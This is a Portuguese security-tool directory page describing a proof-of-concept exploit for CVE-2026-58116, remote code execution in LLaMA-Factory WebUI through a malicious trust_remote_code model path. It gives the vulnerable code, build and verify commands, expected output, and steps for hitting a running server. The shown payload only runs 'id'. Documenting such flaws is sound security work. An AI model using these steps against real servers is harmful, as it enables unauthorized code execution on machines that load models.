Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
llama-factory-webui-rce-cve-2026-58116-trust-remote-code-model-path-injection — Exploit de prova de conceito para CVE-2026-58116 demonstrando execução remota de código no LLaMA-Factory WebUI via injeção de caminho de modelo trust_remote_code. Inclui modelo de payload e script de verificação para testes de segurança autorizados. | Kitploit
Ferramentas/GitHubGitHub/hunt-benito/llama-factory-webui-rce-cve-2026-58116-trust-remote-code-model-path-injection
Análise de VulnerabilidadesAnálise de CódigoExploraçãoExploração de Aplicações WebCTFPapers e PesquisaAprendizado e EducaçãoDesenvolvimento de Payloads
GitHub
hunt-benito/llama-factory-webui-rce-cve-2026-58116-trust-remote-code-model-path-injection

llama-factory-webui-rce-cve-2026-58116-trust-remote-code-model-path-injection

Exploit de prova de conceito para CVE-2026-58116 demonstrando execução remota de código no LLaMA-Factory WebUI via injeção de caminho de modelo trust_remote_code. Inclui modelo de payload e script de verificação para testes de segurança autorizados.

Ver Repositório
2há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-58116 — RCE no WebUI do LLaMA-Factory via trust_remote_code

Prova de conceito para CVE-2026-58116 (CVSS 9.8 Crítico): execução remota de código no LLaMA-Factory <= v0.9.5.

O WebUI do LLaMA-Factory codifica permanentemente trust_remote_code=True ao carregar um modelo (src/llamafactory/webui/chatter.py:139 e runner.py:175,320). O campo "Caminho do Modelo" controlado pelo atacante flui sem validação para AutoTokenizer.from_pretrained() / AutoModel.from_pretrained(), fazendo com que a biblioteca transformers do Hugging Face baixe e execute Python arbitrário de um repositório de modelo malicioso.

⚠️ Apenas para Fins Educacionais

Esta PoC é apenas para testes de segurança autorizados e educação. O payload incluído é intencionalmente inofensivo (imprime o reconhecimento do host via id). Execute-o apenas contra sistemas que você possui ou está autorizado a testar. Nunca implante um payload malicioso contra infraestrutura sem permissão explícita.

Conteúdo

root@kitploit:~
.
├── poc-model/
│   ├── config.json          # declares auto_map → attacker modules
│   ├── configuration_poc.py # payload: runs os.system("id ...") at config load
│   ├── modeling_poc.py      # minimal stub model class
│   └── __init__.py          # makes it an importable package
└── build_and_verify.py      # assemble + verify the sink in isolation

Como o sink funciona

transformers instancia a classe de configuração antes de carregar quaisquer pesos, então o payload em PoCConfig.__init__ é disparado assim que a configuração é lida — nenhum peso precisa existir. Esse é exatamente o caminho que o LLaMA-Factory alcança através de src/llamafactory/model/loader.py:

root@kitploit:~
def _get_init_kwargs(model_args):
    return {"trust_remote_code": model_args.trust_remote_code, ...}   # True (hardcoded)

def load_tokenizer(model_args):
    init_kwargs = _get_init_kwargs(model_args)
    tokenizer = AutoTokenizer.from_pretrained(model_args.model_name_or_path, **init_kwargs)

Início rápido

Verifique o sink localmente (nenhum WebUI necessário — prova o contrato que o WebUI viola):

root@kitploit:~
pip install transformers torch
python3 build_and_verify.py

Saída esperada — observe que o banner do payload aparece durante o carregamento da configuração:

root@kitploit:~
[+] PoC model assembled at .../poc-model
[*] Loading config with trust_remote_code=True (this triggers the PoC)...
============================================================
[CVE-2026-58116 PoC] trust_remote_code payload executed!
  time      : 2026-07-02T...
  host      : gpu-host-01
  user      : hbuser
------------------------------------------------------------
uid=1000(hbuser) gid=1000(hbuser) groups=1000(hbuser)
============================================================
[+] Config loaded: PoCConfig (model_type=poc_model)

Fim a fim através de um WebUI do LLaMA-Factory em execução:

  1. Faça upload do modelo PoC para o Hub:
    root@kitploit:~
    huggingface-cli login
    python3 build_and_verify.py --upload your-user/llmfcty-poc
    
  2. Inicie um board afetado do LLaMA-Factory: llamafactory-cli webui
  3. Abra a aba Chat, defina Caminho do Modelo como your-user/llmfcty-poc, clique em Carregar Modelo.
  4. O payload é executado no servidor como o processo do LLaMA-Factory.

Referências

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-58116
  • Aviso da VulnCheck: https://www.vulncheck.com/advisories/llama-factory-remote-code-execution-via-webui-model-path
  • Divulgação original (h3nrrrych4u): https://gist.github.com/henrrrychau/08d76ec672f42136bbc1449c4f2973f8
Baixar ferramenta